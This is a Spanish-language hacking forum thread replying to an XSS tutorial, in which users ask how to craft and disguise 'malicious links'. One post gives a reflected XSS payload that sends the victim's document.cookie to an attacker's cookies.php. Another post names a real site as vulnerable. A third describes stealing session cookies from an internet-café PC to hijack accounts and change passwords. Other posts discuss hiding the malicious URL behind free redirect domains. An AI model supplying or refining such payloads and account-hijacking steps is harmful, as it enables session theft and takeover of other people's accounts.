[::Tutorial::] - Ataques XSS

joanikus · 18 Agosto 2005, 18:06 PM

okey gracias por el tuto pero yo lo poongo en un buscadoir e nuke et y me da error eso se considera aletra¿

Rentero · 18 Agosto 2005, 18:37 PM

Ni me acordaba de este tutorial xD

Cita de: G4rBaG3 en 15 Agosto 2005, 23:02 PM

Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
Código [Seleccionar] Expandir
<tr> <form name="formul" method="get" action="../home/search.php"> <td><img src="images/spacer.gif" width="5"></td> <td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td> <td><img src="images/spacer.gif" width="3"></td> <td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td> </form>

Salu2.

En este caso no hay ningún botón. Hay un enlace que llama a una función de javascript llamada submit().
Mira el código fuente de esa función a ver si puedes sacar algo

P.D: Recuerdo que esto es solo un pequeño texto de introducción

Y que ya cada vez hay menos webs con este error. Parece que estamos aprendiendo a programar xDD

joanikus · 20 Agosto 2005, 13:02 PM

eyy muxas gracias por el tuto pero una cosilla esa url maligna se puede camuflar con un .tk o .cjb.net??? gracias

Rentero · 20 Agosto 2005, 14:31 PM

Pues upongo que si. Pero si no recuerdo mal ahora en TK te teine 15 segundo(o hasta que pulses un enlace) en una pagina promocinal. No creo que eso sea uy creible...bueno, es cuestión de probar.

-sagitari- · 1 Septiembre 2005, 16:49 PM

una web vulnerable a este tipo de atake es:

www.programas-gratis.net

si no m ekivoco, pero yo como soy una buena niña, m comporto y no ataco lo primero q es vulnerable...

sirdarckcat · 6 Agosto 2006, 09:38 AM

@Torocatala:
prohibido dar informacion de terceros.

satan69 · 7 Agosto 2006, 07:07 AM

mi pregunta es si no hay en el red una pagina para pasar de accsi a hexadecimales.. asi es mas rapido porque encontre una web vulnerable.. jijijiji

Crack_X · 7 Agosto 2006, 07:11 AM

http://www.elhacker.net/sneak.php

satan69 · 7 Agosto 2006, 07:16 AM

Cita de: Crack_X en 7 Agosto 2006, 07:11 AM
http://www.elhacker.net/sneak.php

gracias..

ademas de eso quiero que me ayuden hacer un link maligno..

Código [Seleccionar]


                  <td align="center"><p>Buscar Blogs</p></td>
                </tr>
                <tr>
                  <td align="center"><input id="keyword" name="keyword" size="10" type="text" /></td>
                </tr>
                <tr>
                  <td align="center"><input name="submit" type="submit" value="Buscar" /><

http://www.victima.com/?Keyword=<script>window.location='http://server/cookies.php?cookie='+document.cookie;</script>&buscar=;

la victima no tiene buscador.php sino que en la pagina principal esta el buscador... si es ese el enlace digame sino pues me puede corregir

frankener1986 · 4 Septiembre 2006, 22:49 PM

Otra manera es irse a un ciber, y mirar a alguno que este en una pagina la cual te gustaria tener su cuenta... con un poco de suerte, si cierra la ventana del explorador sin hacer logout, vas al explorador en el que estaba, le das a ver las cookies, buscas el nombre de la pagina, y te las apuntas las dos (o puede que alguna mas, suelen ser user y password), y luego, en tu casa, creas las cookies que copiaste en aquel papel... y listo.. y si la pagina no pide confirmacion de contraseña actual para cambiarle el password, hasta podras hacerlo xD